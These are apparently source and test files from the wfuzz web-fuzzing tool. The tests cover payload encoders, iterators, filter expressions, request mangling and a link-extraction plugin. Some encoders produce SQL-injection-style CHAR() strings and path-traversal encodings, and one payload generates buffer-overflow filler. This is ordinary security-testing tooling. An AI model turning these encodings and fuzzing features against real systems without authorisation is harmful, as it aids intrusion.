60 | value2 = int(value2)
61 |
62 | return (value1 > value2) - (value1 < value2)
63 |
64 | def DeleteRows(self, rows):
65 | # make a copy since we'll be sorting(mutating) the list
66 | rows = list(rows)
67 | # use reverse order so the indexes don't change as we remove items
68 | rows.sort(reverse=True)
69 |
70 | for row in rows:
71 | # remove it from our data structure
72 | del self.data[row]
73 | # notify the view(s) using this model that it has been removed
74 | self.RowDeleted(row)
75 |
76 | def AddRow(self, value):
77 | self.data.append(value)
78 | self.RowAppended()
79 |
80 | def Clear(self):
81 | self.data = []
82 | self.Cleared()
83 |
84 | def DeleteRows_by_filter(self, filter_string):
85 | ffilter = FuzzResFilter(filter_string=filter_string)
86 |
87 | for row, item in reversed(list(enumerate(self.data))):
88 | if ffilter.is_visible(item):
89 | del self.data[row]
90 | self.RowDeleted(row)
91 |
--------------------------------------------------------------------------------
/src/wxfuzz.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | from wfuzz.wfuzz import main_gui
4 |
5 | if __name__ == "__main__":
6 | main_gui()
7 |
--------------------------------------------------------------------------------
/tests/acceptance/test_saved_filter.py:
--------------------------------------------------------------------------------
1 | import pytest
2 | import os
3 | import tempfile
4 |
5 | import wfuzz
6 |
7 |
8 | def get_temp_file():
9 | temp_name = next(tempfile._get_candidate_names())
10 | defult_tmp_dir = tempfile._get_default_tempdir()
11 |
12 | return os.path.join(defult_tmp_dir, temp_name)
13 |
14 |
15 | def test_filter_prev_payload():
16 |
17 | filename = get_temp_file()
18 | for res in wfuzz.get_session(
19 | "-z range --zD 0-0 -H test:1 -u http://localhost:9000/anything/FUZZ"
20 | ).fuzz(save=filename):
21 | pass
22 |
23 | filename_new = get_temp_file()
24 | for res in wfuzz.get_session(
25 | "-z wfuzzp --zD {} -u FUZZ -H test:2 --oF {}".format(filename, filename_new)
26 | ).fuzz(save=filename_new):
27 | pass
28 |
29 | assert (
30 | len(
31 | list(
32 | wfuzz.get_session(
33 | "-z wfuzzp --zD {} --slice r.headers.request.test=2 --dry-run -u FUZZ".format(
34 | filename_new
35 | )
36 | ).fuzz()
37 | )
38 | )
39 | == 1
40 | )
41 | assert (
42 | len(
43 | list(
44 | wfuzz.get_session(
45 | "-z wfuzzp --zD {} --slice FUZZ[r.headers.request.test]=1 --dry-run -u FUZZ".format(
46 | filename_new
47 | )
48 | ).fuzz()
49 | )
50 | )
51 | == 1
52 | )
53 |
--------------------------------------------------------------------------------
/tests/api/test_encoders.py:
--------------------------------------------------------------------------------
1 | import pytest
2 | import wfuzz
3 |
4 |
5 | @pytest.mark.parametrize(
6 | "encoder, text, expected_result",
7 | [
8 | ("none", "test", "test"),
9 | ("urlencode", "../=?&", "../%3D%3F%26"),
10 | ("double_urlencode", "../=?&", "../%253D%253F%2526"),
11 | ("double_urlencode", "../=?&", "../%253D%253F%2526"),
12 | ("base64", "admin", "YWRtaW4="),
13 | ("sha1", "admin", "d033e22ae348aeb5660fc2140aec35850c4da997"),
14 | ("md5", "admin", "21232f297a57a5a743894a0e4a801fc3"),
15 | ("hexlify", "admin", "61646d696e"),
16 | ("html_escape", "<>&'\"/", "<>&'"/"),
17 | ("html_decimal", "<>&'\"/", "<>&'"/"),
18 | ("html_hexadecimal", "<>&'\"/", "<>&'"/"),
19 | ("mysql_char", "admin", "CHAR(97,100,109,105,110)"),
20 | ("mssql_char", "admin", "CHAR(97)+CHAR(100)+CHAR(109)+CHAR(105)+CHAR(110)"),
21 | ("oracle_char", "admin", "chr(97)||chr(100)||chr(109)||chr(105)||chr(110)"),
22 | ],
23 | )
24 | def test_encode(encoder, text, expected_result):
25 | assert wfuzz.encode(encoder, text) == expected_result
26 |
27 |
28 | @pytest.mark.parametrize(
29 | "encoder, text, expected_result",
30 | [
31 | ("none", "test", "test"),
32 | ("urlencode", "../=?&", "../%3D%3F%26"),
33 | ("double_urlencode", "../=?&", "../%253D%253F%2526"),
34 | ("double_urlencode", "../=?&", "../%253D%253F%2526"),
35 | ("base64", "admin", "YWRtaW4="),
36 | ("hexlify", "admin", "61646d696e"),
37 | ("mysql_char", "admin", "CHAR(97,100,109,105,110)"),
38 | ("mssql_char", "admin", "CHAR(97)+CHAR(100)+CHAR(109)+CHAR(105)+CHAR(110)"),
39 | ("oracle_char", "admin", "chr(97)||chr(100)||chr(109)||chr(105)||chr(110)"),
40 | ],
41 | )
42 | def test_decode(encoder, text, expected_result):
43 | assert wfuzz.decode(encoder, expected_result) == text
44 |
--------------------------------------------------------------------------------
/tests/api/test_payload.py:
--------------------------------------------------------------------------------
1 | import pytest
2 | import wfuzz
3 |
4 |
5 | @pytest.mark.parametrize(
6 | "params, expected_result",
7 | [
8 | (
9 | {
10 | "iterator": "zip",
11 | "payloads": [
12 | ("range", {"default": "0-2", "encoder": None}, None),
13 | ("range", {"default": "0-2", "encoder": None}, None),
14 | ],
15 | },
16 | [("0", "0"), ("1", "1"), ("2", "2")],
17 | ),
18 | (
19 | {
20 | "iterator": "chain",
21 | "payloads": [
22 | ("range", {"default": "0-2", "encoder": None}, None),
23 | ("range", {"default": "0-2", "encoder": None}, None),
24 | ],
25 | },
26 | [("0",), ("0",), ("1",), ("1",), ("2",), ("2",)],
27 | ),
28 | (
29 | {
30 | "iterator": "product",
31 | "payloads": [
32 | ("range", {"default": "0-2", "encoder": None}, None),
33 | ("range", {"default": "0-2", "encoder": None}, None),
34 | ],
35 | },
36 | [
37 | ("0", "0"),
38 | ("0", "1"),
39 | ("0", "2"),
40 | ("1", "0"),
41 | ("1", "1"),
42 | ("1", "2"),
43 | ("2", "0"),
44 | ("2", "1"),
45 | ("2", "2"),
46 | ],
47 | ),
48 | (
49 | {"payloads": [("range", {"default": "0-4", "encoder": None}, None)]},
50 | [("0",), ("1",), ("2",), ("3",), ("4",)],
51 | ),
52 | (
53 | {
54 | "payloads": [
55 | ("buffer_overflow", {"default": "10", "encoder": None}, None)
56 | ]
57 | },
58 | [("AAAAAAAAAA",)],
59 | ),
60 | (
61 | {"payloads": [("hexrange", {"default": "09-10", "encoder": None}, None)]},
62 | [("09",), ("0a",), ("0b",), ("0c",), ("0d",), ("0e",), ("0f",), ("10",)],
63 | ),
64 | (
65 | {"payloads": [("hexrange", {"default": "009-00B", "encoder": None}, None)]},
66 | [("009",), ("00a",), ("00b",)],
67 | ),
68 | (
69 | {
70 | "payloads": [
71 | ("ipnet", {"default": "192.168.0.1/30", "encoder": None}, None)
72 | ]
73 | },
74 | [("192.168.0.1",), ("192.168.0.2",)],
75 | ),
76 | (
77 | {
78 | "payloads": [
79 | (
80 | "iprange",
81 | {"default": "192.168.0.1-192.168.0.2", "encoder": None},
82 | None,
83 | )
84 | ]
85 | },
86 | [("192.168.0.1",), ("192.168.0.2",)],
87 | ),
88 | (
89 | {"payloads": [("list", {"default": "a-b", "encoder": None}, None)]},
90 | [("a",), ("b",)],
91 | ),
92 | (
93 | {"payloads": [("list", {"default": "a\\-b-b", "encoder": None}, None)]},
94 | [("a-b",), ("b",)],
95 | ),
96 | (
97 | {"payloads": [("range", {"default": "1-2", "encoder": None}, None)]},
98 | [("1",), ("2",)],
99 | ),
100 | ],
101 | )
102 | def test_payload_iterator(params, expected_result):
103 | assert sorted(list(wfuzz.payload(**params))) == sorted(expected_result)
104 |
105 |
106 | @pytest.mark.parametrize(
107 | "payload, expected_result",
108 | [(range(4), [0, 1, 2, 3]), ([list(range(2)), list(range(2))], [[0, 1], [0, 1]])],
109 | )
110 | def test_get_payload(payload, expected_result):
111 | assert sorted(wfuzz.get_payload(payload).data.get("dictio")[0]) == sorted(
112 | expected_result
113 | )
114 |
--------------------------------------------------------------------------------
/tests/api/test_session.py:
--------------------------------------------------------------------------------
1 | import pytest
2 | import wfuzz
3 |
4 |
5 | @pytest.mark.parametrize(
6 | "session, expected_result",
7 | [
8 | (
9 | "-z range,0-4 http://127.0.0.1/FUZZ",
10 | {
11 | "allvars": None,
12 | "auth": {},
13 | "colour": False,
14 | "compiled_baseline": None,
15 | "compiled_dictio": None,
16 | "compiled_filter": None,
17 | "compiled_prefilter": [],
18 | "compiled_printer": None,
19 | "compiled_seed": None,
20 | "compiled_stats": None,
21 | "concurrent": 10,
22 | "conn_delay": 90,
23 | "connect_to_ip": None,
24 | "console_printer": "",
25 | "cookie": [],
26 | "delay": None,
27 | "dictio": None,
28 | "exec_mode": "api",
29 | "fields": [],
30 | "filter": "",
31 | "follow": False,
32 | "hc": [],
33 | "headers": [],
34 | "hh": [],
35 | "hl": [],
36 | "hs": None,
37 | "hw": [],
38 | "interactive": False,
39 | "iterator": None,
40 | "method": None,
41 | "no_cache": False,
42 | "payloads": [("range", {"default": "0-4", "encoder": None}, None)],
43 | "postdata": None,
44 | "prefilter": [],
45 | "previous": False,
46 | "printer": (None, None),
47 | "proxies": None,
48 | "recipe": [],
49 | "req_delay": 90,
50 | "retries": 3,
51 | "rlevel": 0,
52 | "dlevel": 4,
53 | "save": "",
54 | "sc": [],
55 | "scanmode": False,
56 | "script": "",
57 | "script_args": {},
58 | "seed_payload": False,
59 | "sh": [],
60 | "show_field": None,
61 | "sl": [],
62 | "ss": None,
63 | "sw": [],
64 | "transport": "http",
65 | "url": "http://127.0.0.1/FUZZ",
66 | "verbose": False,
67 | },
68 | )
69 | ],
70 | )
71 | def test_get_payload(session, expected_result):
72 | assert wfuzz.get_session(session).data == expected_result
73 |
--------------------------------------------------------------------------------
/tests/conftest.py:
--------------------------------------------------------------------------------
1 | import pytest
2 |
3 |
4 | from wfuzz.fuzzrequest import FuzzRequest
5 | from wfuzz.fuzzobjects import FuzzResult
6 | from wfuzz.fuzzobjects import FPayloadManager
7 | from wfuzz.filters.ppfilter import FuzzResFilter
8 | from wfuzz.facade import Facade
9 |
10 |
11 | @pytest.fixture
12 | def full_fuzzres(request):
13 | raw_req, raw_resp = request.param
14 | fr = FuzzRequest()
15 | fr.update_from_raw_http(raw_req, "http", raw_resp, None)
16 |
17 | return FuzzResult(history=fr)
18 |
19 |
20 | @pytest.fixture
21 | def full_fuzzreq(request):
22 | raw_req, raw_resp = request.param
23 | fr = FuzzRequest()
24 | fr.update_from_raw_http(raw_req, "http", raw_resp, None)
25 |
26 | return fr
27 |
28 |
29 | @pytest.fixture
30 | def fuzzres_from_url(request):
31 | fr = FuzzRequest()
32 | fr.url = request.param
33 |
34 | return FuzzResult(history=fr)
35 |
36 |
37 | @pytest.fixture
38 | def filter_obj():
39 | return FuzzResFilter()
40 |
41 |
42 | @pytest.fixture
43 | def example_full_fuzzres():
44 | raw_req, raw_resp = (
45 | "GET /path?param1=1¶m2=2 HTTP/1.1\n"
46 | "Host: www.wfuzz.org\n"
47 | "User-Agent: curl/7.58.0\n"
48 | "Accept: */*\n"
49 | "Cookie: cookie1=1\n",
50 | "HTTP/1.1 302 Found\n"
51 | "Content-Type: text/html; charset=utf-8\n"
52 | "Content-Language: en\n"
53 | "Location: https://wfuzz.readthedocs.io/en/latest/\n"
54 | "Vary: Accept-Language, Cookie\n"
55 | "Server: nginx/1.14.0 (Ubuntu)\n"
56 | "X-Fallback: True\n"
57 | "X-Served: Django\n"
58 | "X-Deity: web01\n"
59 | "Date: Wed, 23 Jan 2019 21:43:59 GMT\n"
60 | "Content-Length: 0\n"
61 | "Set-Cookie: name=Nicholas; expires=Sat, 02 May 2009 23:38:25 GMT\n",
62 | )
63 | fr = FuzzRequest()
64 | fr.update_from_raw_http(
65 | raw_req, "http", raw_resp, b"Some line\n and words\nasdsdas"
66 | )
67 |
68 | return FuzzResult(history=fr)
69 |
70 |
71 | @pytest.fixture
72 | def example_full_fuzzres_content(request):
73 | raw_content = request.param
74 |
75 | raw_req, raw_resp = (
76 | "GET /path?param1=1¶m2=2 HTTP/1.1\n"
77 | "Host: www.wfuzz.org\n"
78 | "User-Agent: curl/7.58.0\n"
79 | "Accept: */*\n"
80 | "Cookie: cookie1=1\n",
81 | "HTTP/1.1 200 OK\n"
82 | "Content-Type: text/html; charset=utf-8\n"
83 | "Content-Language: en\n"
84 | "Vary: Accept-Language, Cookie\n"
85 | "Server: nginx/1.14.0 (Ubuntu)\n"
86 | "X-Fallback: True\n"
87 | "X-Served: Django\n"
88 | "X-Deity: web01\n"
89 | "Date: Wed, 23 Jan 2019 21:43:59 GMT\n"
90 | "Content-Length: 0\n"
91 | "Set-Cookie: name=Nicholas; expires=Sat, 02 May 2009 23:38:25 GMT\n",
92 | )
93 | fr = FuzzRequest()
94 | fr.update_from_raw_http(raw_req, "http", raw_resp, raw_content)
95 |
96 | fuzzres = FuzzResult(history=fr)
97 | fuzzres.payload_man = FPayloadManager()
98 |
99 | return fuzzres
100 |
101 |
102 | @pytest.fixture
103 | def example_full_fuzzres_no_response():
104 | raw_req = "GET /path?param1=1¶m2=2 HTTP/1.1\nHost: www.wfuzz.org\nUser-Agent: curl/7.58.0\nAccept: */*\n"
105 |
106 | fr = FuzzRequest()
107 | fr.update_from_raw_http(raw_req, "http", None, None)
108 |
109 | return FuzzResult(history=fr)
110 |
111 |
112 | @pytest.fixture
113 | def get_plugin():
114 | def _get_customer_plugin(name):
115 | return [x() for x in Facade().scripts.get_plugins(name)]
116 |
117 | return _get_customer_plugin
118 |
--------------------------------------------------------------------------------
/tests/filters/test_filter.py:
--------------------------------------------------------------------------------
1 | import pytest
2 |
3 |
4 | @pytest.mark.parametrize(
5 | "filter_string, expected_result",
6 | [
7 | ("h=28 or w=6 or l=2", True),
8 | ("r.params.get.param2='2'", True),
9 | ("r.headers.response.Location", "https://wfuzz.readthedocs.io/en/latest/"),
10 | ("r.headers.response.notthere", {}),
11 | ("r.params.get.notthere", {}),
12 | ("r.cookies.response.notthere", {}),
13 | ("r.cookies.response.notthere='something'", False),
14 | ("r.cookies.response.notthere~'something'", False),
15 | ("r.headers.request.Host", "www.wfuzz.org"),
16 | ("r.headers.request.host", "www.wfuzz.org"),
17 | ("r.headers.response.SeRVEr", "nginx/1.14.0 (Ubuntu)"),
18 | ("r.headers.response.server", "nginx/1.14.0 (Ubuntu)"),
19 | ("r.cookies.request.cookie1", "1"),
20 | ("r.cookies.request.cOOkiE1", "1"),
21 | ("r.cookies.response.name", "Nicholas"),
22 | ("r.cookies.response.nAMe", "Nicholas"),
23 | ("r.params.get.param1", "1"),
24 | ("r.params.get.pAraM1", "1"),
25 | ],
26 | )
27 | def test_filter_ret_values(
28 | filter_obj, example_full_fuzzres, filter_string, expected_result
29 | ):
30 | assert filter_obj.is_visible(example_full_fuzzres, filter_string) == expected_result
31 |
32 |
33 | @pytest.mark.parametrize(
34 | "filter_string, expected_result",
35 | [
36 | ("r.headers.response.notthere", {}),
37 | ("r.params.get.notthere", {}),
38 | ("r.cookies.response.notthere", {}),
39 | ("r.cookies.response.notthere='something'", False),
40 | ],
41 | )
42 | def test_filter_ret_values_no_response(
43 | filter_obj, example_full_fuzzres_no_response, filter_string, expected_result
44 | ):
45 | assert (
46 | filter_obj.is_visible(example_full_fuzzres_no_response, filter_string)
47 | == expected_result
48 | )
49 |
50 |
51 | @pytest.mark.parametrize(
52 | "filter_string, expected_result",
53 | [
54 | (
55 | "r.cookies.response.name|diff('test')",
56 | "--- prev\n\n+++ current\n\n@@ -1 +1 @@\n\n-test\n+Nicholas",
57 | ),
58 | ("r.cookies.response.nAMe|upper()", "NICHOLAS"),
59 | ("r.cookies.response.name|upper()", "NICHOLAS"),
60 | ("r.cookies.response.name|lower()", "nicholas"),
61 | ("r.cookies.response.name|startswith('N')", True),
62 | ("r.cookies.response.name|replace('N','n')", "nicholas"),
63 | ("'%2e%2e'|unquote()", ".."),
64 | ("'%2e%2f'|decode('urlencode')", "./"),
65 | ("'%%'|encode('urlencode')", "%25%25"),
66 | ],
67 | )
68 | def test_filter_operators(
69 | filter_obj, example_full_fuzzres, filter_string, expected_result
70 | ):
71 | assert filter_obj.is_visible(example_full_fuzzres, filter_string) == expected_result
72 |
--------------------------------------------------------------------------------
/tests/filters/test_filter_codes.py:
--------------------------------------------------------------------------------
1 | import pytest
2 |
3 |
4 | @pytest.mark.parametrize(
5 | "fuzzres_from_url, filter_string, expected_result",
6 | [
7 | (
8 | "http://www.wfuzz.org/path/test.php?param=1¶m2=2",
9 | "r.urlp.scheme='http'",
10 | True,
11 | ),
12 | (
13 | "http://www.wfuzz.org/path/test.php?param=1¶m2=2",
14 | "r.urlp.netloc='www.wfuzz.org'",
15 | True,
16 | ),
17 | (
18 | "http://www.wfuzz.org/path/test.php?param=1¶m2=2",
19 | "r.urlp.path='/path/test.php'",
20 | True,
21 | ),
22 | (
23 | "http://www.wfuzz.org/path/test.php?param=1¶m2=2",
24 | "r.urlp.ffname='test.php'",
25 | True,
26 | ),
27 | (
28 | "http://www.wfuzz.org/path/test.php?param=1¶m2=2",
29 | "r.urlp.fname='test'",
30 | True,
31 | ),
32 | (
33 | "http://www.wfuzz.org/path/test.php?param=1¶m2=2",
34 | "r.urlp.hasquery",
35 | True,
36 | ),
37 | (
38 | "http://www.wfuzz.org/path/test.php?param=1¶m2=2",
39 | "not r.urlp.isbllist",
40 | True,
41 | ),
42 | ],
43 | indirect=["fuzzres_from_url"],
44 | )
45 | def test_urlp(filter_obj, fuzzres_from_url, filter_string, expected_result):
46 | assert filter_obj.is_visible(fuzzres_from_url, filter_string) == expected_result
47 |
48 |
49 | @pytest.mark.parametrize(
50 | "fuzzres_from_url, filter_string, expected_result",
51 | [("http://www.wfuzz.org/path?param=1¶m2=2", "r.is_path", False)],
52 | indirect=["fuzzres_from_url"],
53 | )
54 | def test_ispath(filter_obj, fuzzres_from_url, filter_string, expected_result):
55 | assert filter_obj.is_visible(fuzzres_from_url, filter_string) == expected_result
56 |
57 |
58 | @pytest.mark.parametrize(
59 | "fuzzres_from_url, filter_string, expected_result",
60 | [
61 | (
62 | "http://www.wfuzz.org/path?param=1¶m2=2",
63 | "r.pstrip",
64 | "http://www.wfuzz.org/path-gparam-gparam2",
65 | ),
66 | ],
67 | indirect=["fuzzres_from_url"],
68 | )
69 | def test_pstrip(filter_obj, fuzzres_from_url, filter_string, expected_result):
70 | assert filter_obj.is_visible(fuzzres_from_url, filter_string) == expected_result
71 |
--------------------------------------------------------------------------------
/tests/filters/test_filter_urlp.py:
--------------------------------------------------------------------------------
1 | import pytest
2 |
3 |
4 | @pytest.mark.parametrize(
5 | "fuzzres_from_url, filter_string, expected_result",
6 | [
7 | (
8 | "http://www.wfuzz.org/path/test.php?param=1¶m2=2",
9 | "r.urlp.scheme='http'",
10 | True,
11 | ),
12 | (
13 | "http://www.wfuzz.org/path/test.php?param=1¶m2=2",
14 | "r.urlp.netloc='www.wfuzz.org'",
15 | True,
16 | ),
17 | (
18 | "http://www.wfuzz.org/path/test.php?param=1¶m2=2",
19 | "r.urlp.path='/path/test.php'",
20 | True,
21 | ),
22 | (
23 | "http://www.wfuzz.org/path/test.php?param=1¶m2=2",
24 | "r.urlp.ffname='test.php'",
25 | True,
26 | ),
27 | (
28 | "http://www.wfuzz.org/path/test.php?param=1¶m2=2",
29 | "r.urlp.fname='test'",
30 | True,
31 | ),
32 | (
33 | "http://www.wfuzz.org/path/test.php?param=1¶m2=2",
34 | "r.urlp.hasquery",
35 | True,
36 | ),
37 | (
38 | "http://www.wfuzz.org/path/test.php?param=1¶m2=2",
39 | "not r.urlp.isbllist",
40 | True,
41 | ),
42 | ],
43 | indirect=["fuzzres_from_url"],
44 | )
45 | def test_urlp(filter_obj, fuzzres_from_url, filter_string, expected_result):
46 | assert filter_obj.is_visible(fuzzres_from_url, filter_string) == expected_result
47 |
48 |
49 | @pytest.mark.parametrize(
50 | "fuzzres_from_url, filter_string, expected_result",
51 | [("http://www.wfuzz.org/path?param=1¶m2=2", "r.is_path", False)],
52 | indirect=["fuzzres_from_url"],
53 | )
54 | def test_ispath(filter_obj, fuzzres_from_url, filter_string, expected_result):
55 | assert filter_obj.is_visible(fuzzres_from_url, filter_string) == expected_result
56 |
57 |
58 | @pytest.mark.parametrize(
59 | "fuzzres_from_url, filter_string, expected_result",
60 | [
61 | (
62 | "http://www.wfuzz.org/path?param=1¶m2=2",
63 | "r.pstrip",
64 | "http://www.wfuzz.org/path-gparam-gparam2",
65 | ),
66 | ],
67 | indirect=["fuzzres_from_url"],
68 | )
69 | def test_pstrip(filter_obj, fuzzres_from_url, filter_string, expected_result):
70 | assert filter_obj.is_visible(fuzzres_from_url, filter_string) == expected_result
71 |
--------------------------------------------------------------------------------
/tests/filters/test_prefilter_mangle.py:
--------------------------------------------------------------------------------
1 | import pytest
2 |
3 |
4 | @pytest.mark.parametrize(
5 | "fuzzres_from_url, filter_string, expected_result",
6 | [
7 | (
8 | "http://www.wfuzz.org/path?param=1¶m2=2",
9 | "r.url=+'test'",
10 | "http://www.wfuzz.org/path?param=1¶m2=2test",
11 | ),
12 | ("http://www.wfuzz.org/path?param=1¶m2=2", "r.url:='test'", "http://test/"),
13 | (
14 | "http://www.wfuzz.org/path?param=1¶m2=2",
15 | "r.url=-'test'",
16 | "testhttp://www.wfuzz.org/path?param=1¶m2=2",
17 | ),
18 | ],
19 | indirect=["fuzzres_from_url"],
20 | )
21 | def test_url_set(filter_obj, fuzzres_from_url, filter_string, expected_result):
22 | filter_obj.is_visible(fuzzres_from_url, filter_string)
23 | assert fuzzres_from_url.history.url == expected_result
24 |
25 |
26 | @pytest.mark.parametrize(
27 | "fuzzres_from_url, filter_string, expected_result",
28 | [("http://www.wfuzz.org/path?param", "r.params.all=+'test'", {"param": None})],
29 | indirect=["fuzzres_from_url"],
30 | )
31 | def test_params_set_no_value(
32 | filter_obj, fuzzres_from_url, filter_string, expected_result
33 | ):
34 | filter_obj.is_visible(fuzzres_from_url, filter_string)
35 | assert fuzzres_from_url.history.params.get == expected_result
36 |
37 |
38 | @pytest.mark.parametrize(
39 | "fuzzres_from_url, filter_string, expected_result",
40 | [
41 | (
42 | "http://www.wfuzz.org/path?param=1¶m2=2",
43 | "r.params.get.param=+'test'",
44 | {"param": "1test", "param2": "2"},
45 | ),
46 | (
47 | "http://www.wfuzz.org/path?param=1¶m2=2",
48 | "r.params.get.param=-'test'",
49 | {"param": "test1", "param2": "2"},
50 | ),
51 | (
52 | "http://www.wfuzz.org/path?param=1¶m2=2",
53 | "r.params.all=+'2'",
54 | {"param": "12", "param2": "22"},
55 | ),
56 | (
57 | "http://www.wfuzz.org/path?param=1¶m2=2",
58 | "r.params.all:='2'",
59 | {"param": "2", "param2": "2"},
60 | ),
61 | (
62 | "http://www.wfuzz.org/path?param=1¶m2=2",
63 | "r.params.get.notthere=-'2'",
64 | {"param": "1", "param2": "2"},
65 | ),
66 | (
67 | "http://www.wfuzz.org/path?param=1¶m2=2",
68 | "r.params.get.notthere=+'2'",
69 | {"param": "1", "param2": "2"},
70 | ),
71 | (
72 | "http://www.wfuzz.org/path?param=1¶m2=2",
73 | "r.params.get.notthere:='2'",
74 | {"notthere": "2", "param": "1", "param2": "2"},
75 | ),
76 | ],
77 | indirect=["fuzzres_from_url"],
78 | )
79 | def test_params_set(filter_obj, fuzzres_from_url, filter_string, expected_result):
80 | filter_obj.is_visible(fuzzres_from_url, filter_string)
81 | assert fuzzres_from_url.history.params.all == expected_result
82 |
--------------------------------------------------------------------------------
/tests/filters/test_prefilter_mangle_codes.py:
--------------------------------------------------------------------------------
1 | import pytest
2 |
3 |
4 | @pytest.mark.parametrize(
5 | "filter_string, expected_result",
6 | [("r.code:=429", 429), ("r.c:=404", 404), ("r.c=+404", 706), ("r.c=-2", 300)],
7 | )
8 | def test_code_set(filter_obj, example_full_fuzzres, filter_string, expected_result):
9 | filter_obj.is_visible(example_full_fuzzres, filter_string)
10 | assert example_full_fuzzres.code == expected_result
11 |
--------------------------------------------------------------------------------
/tests/helpers/test_dotdict.py:
--------------------------------------------------------------------------------
1 | import pytest
2 |
3 | from wfuzz.helpers.obj_dic import DotDict
4 | from wfuzz.helpers.obj_dyn import rgetattr
5 |
6 |
7 | @pytest.fixture
8 | def dotdict_ex1():
9 | return DotDict({"a": "1"})
10 |
11 |
12 | @pytest.fixture
13 | def dotdict_ex2():
14 | return DotDict({"a": "2"})
15 |
16 |
17 | def test_operators(dotdict_ex1, dotdict_ex2):
18 | assert dotdict_ex1 == {"a": "1"}
19 | assert dotdict_ex1 + "test" == {"a": "1test"}
20 | assert "test" + dotdict_ex1 == {"a": "test1"}
21 | assert dotdict_ex1 + dotdict_ex2 == {"a": "2"}
22 | assert dotdict_ex2 + dotdict_ex1 == {"a": "1"}
23 |
24 |
25 | def test_nonexisting_key_returns_none(dotdict_ex1):
26 | assert dotdict_ex1["anything"] == {}
27 |
28 |
29 | def test_nonexisting_attr_returns_empty_dict(dotdict_ex1):
30 | assert rgetattr(dotdict_ex1, "anything") == {}
31 |
--------------------------------------------------------------------------------
/tests/helpers/test_insensitive_dict.py:
--------------------------------------------------------------------------------
1 | import pytest
2 |
3 | from wfuzz.helpers.obj_dic import CaseInsensitiveDict
4 |
5 |
6 | @pytest.fixture
7 | def case_dict():
8 | return CaseInsensitiveDict({"OnE": 1})
9 |
10 |
11 | @pytest.mark.parametrize("key, expected_result", [("one", 1), ("oNe", 1)])
12 | def test_key_get_item(case_dict, key, expected_result):
13 | assert case_dict[key] == expected_result
14 | assert case_dict.get(key) == expected_result
15 |
16 |
17 | @pytest.mark.parametrize(
18 | "key, expected_result",
19 | [("One", True), ("OnE", True), ("one", True), ("onetwo", False)],
20 | )
21 | def test_key_in_item(case_dict, key, expected_result):
22 | assert (key in case_dict) == expected_result
23 |
24 |
25 | def test_update():
26 | dd = CaseInsensitiveDict({})
27 | dd.update({"OnE": 1})
28 |
29 | assert dd["one"] == 1
30 | assert dd["oNe"] == 1
31 |
32 |
33 | def test_key_in(case_dict):
34 | assert list(case_dict.keys()) == ["OnE"]
35 |
--------------------------------------------------------------------------------
/tests/plugins/test_links.py:
--------------------------------------------------------------------------------
1 | import pytest
2 | import re
3 |
4 | from queue import Queue
5 |
6 |
7 | @pytest.mark.parametrize(
8 | "example_full_fuzzres_content, expected_links",
9 | [
10 | # getting data-href for now (b'<link rel="manifest" data-href="/android-chrome-manifest.json">\n', [],),
11 | (
12 | b'<href="1.json"href="2.json">\n',
13 | ["http://www.wfuzz.org/1.json", "http://www.wfuzz.org/2.json"],
14 | ),
15 | (
16 | b'<link rel="manifest" href="/android-chrome-manifest.json">\n',
17 | ["http://www.wfuzz.org/android-chrome-manifest.json"],
18 | ),
19 | (
20 | b'<link rel="alternate" href="https://www.wfuzz.org/" hreflang="en-AE" />',
21 | ["https://www.wfuzz.org/"],
22 | ),
23 | (b'<link rel="dns-prefetch" href="https://www.wfuzz.io">\n', [],),
24 | (b'<script src="//js.wfuzz.org/sttc/main.93d0d236.js"></script>', [],),
25 | ],
26 | indirect=["example_full_fuzzres_content"],
27 | )
28 | def test_parsed_links(example_full_fuzzres_content, get_plugin, expected_links):
29 | links_plugin = get_plugin("links")[0]
30 | links_plugin.results_queue = Queue()
31 | links_plugin.base_fuzz_res = example_full_fuzzres_content
32 | links_plugin.add_path = False
33 |
34 | assert links_plugin.name == "links"
35 |
36 | links_plugin.process(example_full_fuzzres_content)
37 |
38 | results = []
39 | while not links_plugin.results_queue.empty():
40 | results.append(links_plugin.results_queue.get())
41 |
42 | assert [
43 | fzres._seed.history.url for fzres in results if fzres._seed
44 | ] == expected_links
45 |
46 |
47 | @pytest.mark.parametrize(
48 | "example_full_fuzzres_content, expected_links",
49 | [
50 | (
51 | b'<link rel="dns-prefetch" href="https://www.wfuzz.io">\n',
52 | ["https://www.wfuzz.io/"],
53 | ),
54 | (
55 | b'<script src="//js.wfuzz.org/sttc/main.93d0d236.js"></script>',
56 | ["http://js.wfuzz.org/sttc/main.93d0d236.js"],
57 | ),
58 | ],
59 | indirect=["example_full_fuzzres_content"],
60 | )
61 | def test_regex_option(example_full_fuzzres_content, get_plugin, expected_links):
62 | links_plugin = get_plugin("links")[0]
63 | links_plugin.results_queue = Queue()
64 | links_plugin.base_fuzz_res = example_full_fuzzres_content
65 | links_plugin.add_path = False
66 | links_plugin.domain_regex = re.compile("wfuzz", re.MULTILINE | re.DOTALL)
67 |
68 | assert links_plugin.name == "links"
69 |
70 | links_plugin.process(example_full_fuzzres_content)
71 |
72 | results = []
73 | while not links_plugin.results_queue.empty():
74 | results.append(links_plugin.results_queue.get())
75 |
76 | assert [
77 | fzres._seed.history.url for fzres in results if fzres._seed
78 | ] == expected_links
79 |
--------------------------------------------------------------------------------
/tests/plugins/test_summary.py:
--------------------------------------------------------------------------------
1 | from wfuzz.factories.plugin_factory import plugin_factory
2 | from wfuzz.fuzzobjects import FuzzPlugin
3 |
4 | from queue import Queue
5 |
6 |
7 | def test_sum_plugin_output(example_full_fuzzres):
8 | plugin = plugin_factory.create("plugin_from_summary", "a message")
9 |
10 | assert plugin.is_visible(True) is False
11 | assert plugin.is_visible(False) is True
12 |
13 |
14 | def test_find_plugin_output_from_factory():
15 | plugin = plugin_factory.create(
16 | "plugin_from_finding",
17 | "a plugin",
18 | "a source",
19 | "an issue",
20 | "some data",
21 | FuzzPlugin.INFO,
22 | )
23 |
24 | assert plugin.is_visible(True) is True
25 | assert plugin.is_visible(False) is False
26 |
27 |
28 | def test_find_plugin_output(get_plugin):
29 | plugin = get_plugin("links")[0]
30 | plugin.results_queue = Queue()
31 | plugin.add_result("a source", "an issue", "some data", FuzzPlugin.INFO)
32 |
33 | plugin_res = plugin.results_queue.get()
34 |
35 | assert plugin_res.is_visible(True) is True
36 | assert plugin_res.is_visible(False) is False
37 |
--------------------------------------------------------------------------------
/tests/server_dir/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM python:3.6-alpine
2 | ADD . /code
3 | WORKDIR /code
4 | EXPOSE 8000/tcp
